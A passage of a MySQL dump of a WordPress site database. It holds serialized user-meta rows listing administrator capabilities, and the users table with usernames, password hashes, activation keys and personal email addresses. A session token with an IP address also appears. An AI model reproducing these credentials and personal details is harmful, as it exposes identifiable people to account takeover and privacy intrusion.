4:\"edit_tc_tickets_instance\";b:1;s:24:\"read_tc_tickets_instance\";b:1;s:26:\"delete_tc_tickets_instance\";b:1;s:27:\"create_tc_tickets_instances\";b:1;s:25:\"edit_tc_tickets_instances\";b:1;s:38:\"edit_others_posts_tc_tickets_instances\";b:1;s:28:\"publish_tc_tickets_instances\";b:1;s:33:\"read_private_tc_tickets_instances\";b:1;s:27:\"delete_tc_tickets_instances\";b:1;s:35:\"delete_private_tc_tickets_instances\";b:1;s:37:\"delete_published_tc_tickets_instances\";b:1;s:34:\"delete_others_tc_tickets_instances\";b:1;s:33:\"edit_private_tc_tickets_instances\";b:1;s:35:\"edit_published_tc_tickets_instances\";b:1;s:13:\"edit_tc_order\";b:1;s:13:\"read_tc_order\";b:1;s:15:\"delete_tc_order\";b:1;s:16:\"create_tc_orders\";b:1;s:14:\"edit_tc_orders\";b:1;s:27:\"edit_others_posts_tc_orders\";b:1;s:17:\"publish_tc_orders\";b:1;s:22:\"read_private_tc_orders\";b:1;s:16:\"delete_tc_orders\";b:1;s:24:\"delete_private_tc_orders\";b:1;s:26:\"delete_published_tc_orders\";b:1;s:23:\"delete_others_tc_orders\";b:1;s:22:\"edit_private_tc_orders\";b:1;s:24:\"edit_published_tc_orders\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:6:\"sp_cdm\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"sp_cdm_settings\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:11:\"sp_cdm_help\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:17:\"sp_cdm_categories\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:14:\"ure_edit_roles\";b:1;s:16:\"ure_create_roles\";b:1;s:16:\"ure_delete_roles\";b:1;s:23:\"ure_create_capabilities\";b:1;s:23:\"ure_delete_capabilities\";b:1;s:18:\"ure_manage_options\";b:1;s:15:\"ure_reset_roles\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:16:\"manage_downloads\";b:1;s:21:\"access_server_browser\";b:1;s:10:\"delete_ads\";b:1;s:17:\"delete_others_ads\";b:1;s:20:\"delete_published_ads\";b:1;s:8:\"edit_ads\";b:1;s:15:\"edit_others_ads\";b:1;s:16:\"edit_private_ads\";b:1;s:18:\"edit_published_ads\";b:1;s:11:\"publish_ads\";b:1;s:16:\"read_private_ads\";b:1;s:19:\"delete_applications\";b:1;s:26:\"delete_others_applications\";b:1;s:29:\"delete_published_applications\";b:1;s:17:\"edit_applications\";b:1;s:24:\"edit_others_applications\";b:1;s:25:\"edit_private_applications\";b:1;s:27:\"edit_published_applications\";b:1;s:20:\"publish_applications\";b:1;s:19:\"create_applications\";b:1;s:25:\"read_private_applications\";b:1;s:20:\"wpseo_manage_options\";b:1;s:11:\"hustle_menu\";b:1;s:18:\"hustle_edit_module\";b:1;s:13:\"hustle_create\";b:1;s:24:\"hustle_edit_integrations\";b:1;s:20:\"hustle_access_emails\";b:1;s:20:\"hustle_edit_settings\";b:1;s:16:\"hustle_analytics\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(432,1,'itsec-password-strength','4'),(433,1,'_itsec_password_requirements','a:1:{s:16:\"evaluation_times\";a:1:{s:8:\"strength\";i:1562251457;}}'),(434,1,'default_password_nag',''),(435,1,'-meta','a:2:{s:6:\"prefix\";s:0:\"\";s:7:\"user_id\";i:1;}'),(436,1,'icwp-wpsf-meta-version','1203'),(437,6,'_itsec_has_logged_in','1579398135'),(438,6,'icwp-wpsf-meta','a:7:{s:6:\"prefix\";s:9:\"icwp-wpsf\";s:7:\"user_id\";i:6;s:9:\"pass_hash\";s:4:\"65d2\";s:15:\"pass_started_at\";i:1579398137;s:13:\"first_seen_at\";i:1579398137;s:9:\"flash_msg\";a:4:{s:7:\"message\";s:139:\"[Shield Security] Warning: Can not use the Rename WP Login feature because you have the \"Theme My Login\" plugin installed and it is active.\";s:10:\"expires_at\";i:1613258515;s:5:\"error\";b:1;s:10:\"show_login\";b:0;}s:5:\"tours\";a:1:{s:17:\"insights_overview\";i:1611693907;}}'),(439,6,'icwp-wpsf-meta-version','1022'),(483,6,'lwz_yoast_notifications','a:1:{i:0;a:2:{s:7:\"message\";O:61:\"Yoast\\WP\\SEO\\Presenters\\Admin\\Indexing_Notification_Presenter\":3:{s:18:\"\0*\0total_unindexed\";i:397;s:9:\"\0*\0reason\";s:26:\"permalink_settings_changed\";s:20:\"\0*\0short_link_helper\";O:38:\"Yoast\\WP\\SEO\\Helpers\\Short_Link_Helper\":2:{s:17:\"\0*\0options_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Options_Helper\":0:{}s:17:\"\0*\0product_helper\";O:35:\"Yoast\\WP\\SEO\\Helpers\\Product_Helper\":0:{}}}s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"6\";s:10:\"user_login\";s:15:\"crystalwhitaker\";s:9:\"user_pass\";s:34:\"$P$BoMJMLrOiZbH99vOUtqazq.x4.Eots.\";s:13:\"user_nicename\";s:15:\"crystalwhitaker\";s:10:\"user_email\";s:28:\"crystal.whitaker@outlook.com\";s:8:\"user_url\";s:23:\"http://www.zphiblgz.org\";s:15:\"user_registered\";s:19:\"2017-10-23 06:04:59\";s:19:\"user_activation_key\";s:45:\"1508738699:$P$BANhDc8cSsGFeNLgecxgyR30e4e6DK0\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:16:\"Crystal Whitaker\";}s:2:\"ID\";i:6;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:16:\"lwz_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:274:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"cuar_view_account\";b:1;s:17:\"cuar_edit_account\";b:1;s:16:\"cuar_pp_list_all\";b:1;s:12:\"cuar_pp_edit\";b:1;s:14:\"cuar_pp_delete\";b:1;s:12:\"cuar_pp_read\";b:1;s:25:\"cuar_pp_manage_categories\";b:1;s:23:\"cuar_pp_edit_categories\";b:1;s:25:\"cuar_pp_delete_categories\";b:1;s:25:\"cuar_pp_assign_categories\";b:1;s:15:\"cuar_view_pages\";b:1;s:31:\"cuar_view_any_cuar_private_page\";b:1;s:26:\"cuar_pf_manage_attachments\";b:1;s:16:\"cuar_pf_list_all\";b:1;s:12:\"cuar_pf_edit\";b:1;s:14:\"cuar_pf_delete\";b:1;s:12:\"cuar_pf_read\";b:1;s:25:\"cuar_pf_manage_categories\";b:1;s:23:\"cuar_pf_edit_categories\";b:1;s:25:\"cuar_pf_delete_categories\";b:1;s:25:\"cuar_pf_assign_categories\";b:1;s:15:\"cuar_view_files\";b:1;s:31:\"cuar_view_any_cuar_private_file\";b:1;s:23:\"cuar_access_admin_panel\";b:1;s:23:\"view-customer-area-menu\";b:1;s:17:\"cuar_view_top_bar\";b:1;s:17:\"manage_events_cap\";b:1;s:23:\"manage_ticket_types_cap\";b:1;s:25:\"manage_discount_codes_cap\";b:1;s:17:\"manage_orders_cap\";b:1;s:20:\"manage_attendees_cap\";b:1;s:27:\"manage_ticket_templates_cap\";b:1;s:19:\"delete_checkins_cap\";b:1;s:20:\"delete_attendees_cap\";b:1;s:19:\"manage_settings_cap\";b:1;s:15:\"save_ticket_cap\";b:1;s:16:\"add_discount_cap\";b:1;s:17:\"publish_tc_events\";b:1;s:14:\"edit_tc_events\";b:1;s:21:\"edit_others_tc_events\";b:1;s:16:\"delete_tc_events\";b:1;s:23:\"delete_others_tc_events\";b:1;s:22:\"read_private_tc_events\";b:1;s:13:\"edit_tc_event\";b:1;s:15:\"delete_tc_event\";b:1;s:13:\"read_tc_event\";b:1;s:24:\"edit_published_tc_events\";b:1;s:22:\"edit_private_tc_events\";b:1;s:24:\"delete_private_tc_events\";b:1;s:26:\"delete_published_tc_events\";b:1;s:16:\"create_tc_events\";b:1;s:18:\"publish_tc_tickets\";b:1;s:15:\"edit_tc_tickets\";b:1;s:14:\"edit_tc_ticket\";b:1;s:22:\"edit_others_tc_tickets\";b:1;s:17:\"delete_tc_tickets\";b:1;s:24:\"delete_others_tc_tickets\";b:1;s:23:\"read_private_tc_tickets\";b:1;s:16:\"delete_tc_ticket\";b:1;s:14:\"read_tc_ticket\";b:1;s:25:\"edit_published_tc_tickets\";b:1;s:23:\"edit_private_tc_tickets\";b:1;s:25:\"delete_private_tc_tickets\";b:1;s:27:\"delete_published_tc_tickets\";b:1;s:17:\"create_tc_tickets\";b:1;s:24:\"edit_tc_tickets_instance\";b:1;s:24:\"read_tc_tickets_instance\";b:1;s:26:\"delete_tc_tickets_instance\";b:1;s:27:\"create_tc_tickets_instances\";b:1;s:25:\"edit_tc_tickets_instances\";b:1;s:38:\"edit_others_posts_tc_tickets_instances\";b:1;s:28:\"publish_tc_tickets_instances\";b:1;s:33:\"read_private_tc_tickets_instances\";b:1;s:27:\"delete_tc_tickets_instances\";b:1;s:35:\"delete_private_tc_tickets_instances\";b:1;s:37:\"delete_published_tc_tickets_instances\";b:1;s:34:\"delete_others_tc_tickets_instances\";b:1;s:33:\"edit_private_tc_tickets_instances\";b:1;s:35:\"edit_published_tc_tickets_instances\";b:1;s:13:\"edit_tc_order\";b:1;s:13:\"read_tc_order\";b:1;s:15:\"delete_tc_order\";b:1;s:16:\"create_tc_orders\";b:1;s:14:\"edit_tc_orders\";b:1;s:27:\"edit_others_posts_tc_orders\";b:1;s:17:\"publish_tc_orders\";b:1;s:22:\"read_private_tc_orders\";b:1;s:16:\"delete_tc_orders\";b:1;s:24:\"delete_private_tc_orders\";b:1;s:26:\"delete_published_tc_orders\";b:1;s:23:\"delete_others_tc_orders\";b:1;s:22:\"edit_private_tc_orders\";b:1;s:24:\"edit_published_tc_orders\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:6:\"sp_cdm\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"sp_cdm_settings\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:11:\"sp_cdm_help\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:17:\"sp_cdm_categories\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:14:\"ure_edit_roles\";b:1;s:16:\"ure_create_roles\";b:1;s:16:\"ure_delete_roles\";b:1;s:23:\"ure_create_capabilities\";b:1;s:23:\"ure_delete_capabilities\";b:1;s:18:\"ure_manage_options\";b:1;s:15:\"ure_reset_roles\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:16:\"manage_downloads\";b:1;s:21:\"access_server_browser\";b:1;s:10:\"delete_ads\";b:1;s:17:\"delete_others_ads\";b:1;s:20:\"delete_published_ads\";b:1;s:8:\"edit_ads\";b:1;s:15:\"edit_others_ads\";b:1;s:16:\"edit_private_ads\";b:1;s:18:\"edit_published_ads\";b:1;s:11:\"publish_ads\";b:1;s:16:\"read_private_ads\";b:1;s:19:\"delete_applications\";b:1;s:26:\"delete_others_applications\";b:1;s:29:\"delete_published_applications\";b:1;s:17:\"edit_applications\";b:1;s:24:\"edit_others_applications\";b:1;s:25:\"edit_private_applications\";b:1;s:27:\"edit_published_applications\";b:1;s:20:\"publish_applications\";b:1;s:19:\"create_applications\";b:1;s:25:\"read_private_applications\";b:1;s:20:\"wpseo_manage_options\";b:1;s:11:\"hustle_menu\";b:1;s:18:\"hustle_edit_module\";b:1;s:13:\"hustle_create\";b:1;s:24:\"hustle_edit_integrations\";b:1;s:20:\"hustle_access_emails\";b:1;s:20:\"hustle_edit_settings\";b:1;s:16:\"hustle_analytics\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),(462,6,'hustle_dismissed_notifications','a:1:{i:0;s:38:\"show_review_css_after_migration_notice\";}'),(467,6,'_gf_stla_reviews_dismissed_triggers','a:1:{s:14:\"time_installed\";s:2:\"30\";}'),(468,6,'_gf_stla_reviews_last_dismissed','2021-01-26 03:00:09'),(469,6,'_gf_stla_reviews_already_did','1'),(441,6,'lwz_user-settings','libraryContent=browse&editor=html'),(442,6,'lwz_user-settings-time','1579404067'),(443,6,'closedpostboxes_page','a:0:{}'),(444,6,'metaboxhidden_page','a:8:{i:0;s:10:\"ts_sidebar\";i:1;s:15:\"ts_page_options\";i:2;s:12:\"revisionsdiv\";i:3;s:10:\"postcustom\";i:4;s:16:\"commentstatusdiv\";i:5;s:11:\"commentsdiv\";i:6;s:7:\"slugdiv\";i:7;s:9:\"authordiv\";}'),(480,1,'session_tokens','a:1:{s:64:\"02f3092f8a96f630187263c9ab38457e478d4b8eb548f59ed5e8a15b58b2e4e6\";a:4:{s:10:\"expiration\";i:1633521709;s:2:\"ip\";s:12:\"71.120.26.35\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\";s:5:\"login\";i:1632312109;}}'),(455,1,'lwz_wpseo-upsell-notice','seen'),(459,6,'wpseo-dismiss-configuration-notice','yes'),(460,6,'wpseo-remove-upsell-notice','1'),(481,1,'w3tc_features_seen','a:2:{i:1;s:14:\"lazyload_gmaps\";i:2;s:11:\"setup_guide\";}'),(475,1,'_gf_stla_reviews_dismissed_triggers','a:1:{s:14:\"time_installed\";s:2:\"30\";}'),(476,1,'_gf_stla_reviews_last_dismissed','2021-01-26 10:20:41'),(477,1,'_gf_stla_reviews_already_did','1');
/*!40000 ALTER TABLE `lwz_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_users`
--

DROP TABLE IF EXISTS `lwz_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_users`
--

LOCK TABLES `lwz_users` WRITE;
/*!40000 ALTER TABLE `lwz_users` DISABLE KEYS */;
INSERT INTO `lwz_users` VALUES (1,'pr@zphiblgz.org','$P$B24Ukj6o3r48k.W/YnqTRZdlzCX5Dq.','przphiblgz-org','pr@zphiblgz.org','','2016-11-29 16:28:18','',0,'pr@zphiblgz.org'),(2,'lillet','$P$B3DT9eiARfpZZ1hMsOjTAcBfY.MFCs/','lillet','lillet1920@gmail.com','','2016-12-13 20:17:39','1481660260:$P$BUF8JP6R2cOy/ZApmYP5.bZGxG2CCl1',0,'Lillet'),(6,'crystalwhitaker','$P$BoMJMLrOiZbH99vOUtqazq.x4.Eots.','crystalwhitaker','crystal.whitaker@outlook.com','http://www.zphiblgz.org','2017-10-23 06:04:59','1508738699:$P$BANhDc8cSsGFeNLgecxgyR30e4e6DK0',0,'Crystal Whitaker'),(7,'lgz_president','$P$BozNnOB4cdyStxUN58YYS/rinS0I0i.','lgz_president','president@zphiblgz.org','','2017-10-23 06:10:08','1508739008:$P$BGUJYUisHhjzDJmG2kaAVgcraVjf6W1',0,'lgz_president'),(8,'triggins','$P$B2ePtGbRwIE0PhynUDpj4SvuINe14J/','triggins','tanya613@me.com','','2018-09-18 03:14:48','1537970935:$P$BvkUB8pei1kO7ZPN0D6qBBS63ww7qK.',0,'Tanya Riggins');
/*!40000 ALTER TABLE `lwz_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_wc_download_log`
--

DROP TABLE IF EXISTS `lwz_wc_download_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_wc_download_log` (
  `download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `permission_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip_address` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT '',
  PRIMARY KEY (`download_log_id`),
  KEY `permission_id` (`permission_id`),
  KEY `timestamp` (`timestamp`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_wc_download_log`
--

LOCK TABLES `lwz_wc_download_log` WRITE;
/*!40000 ALTER TABLE `lwz_wc_download_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_wc_download_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_wc_webhooks`
--

DROP TABLE IF EXISTS `lwz_wc_webhooks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_wc_webhooks` (
  `webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `status` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `name` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `delivery_url` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `secret` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `topic` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `api_version` smallint(4) NOT NULL,
  `failure_count` smallint(10) NOT NULL DEFAULT '0',
  `pending_delivery` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`webhook_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_wc_webhooks`
--

LOCK TABLES `lwz_wc_webhooks` WRITE;
/*!40000 ALTER TABLE `lwz_wc_webhooks` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_wc_webhooks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_api_keys`
--

DROP TABLE IF EXISTS `lwz_woocommerce_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_woocommerce_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `permissions` varchar(10) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `consumer_key` char(64) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `consumer_secret` char(43) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `nonces` longtext COLLATE utf8mb4_unicode_520_ci,
  `truncated_key` char(7) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_woocommerce_api_keys`
--

LOCK TABLES `lwz_woocommerce_api_keys` WRITE;
/*!40000 ALTER TABLE `lwz_woocommerce_api_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_woocommerce_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_woocommerce_attribute_taxonomies`
--

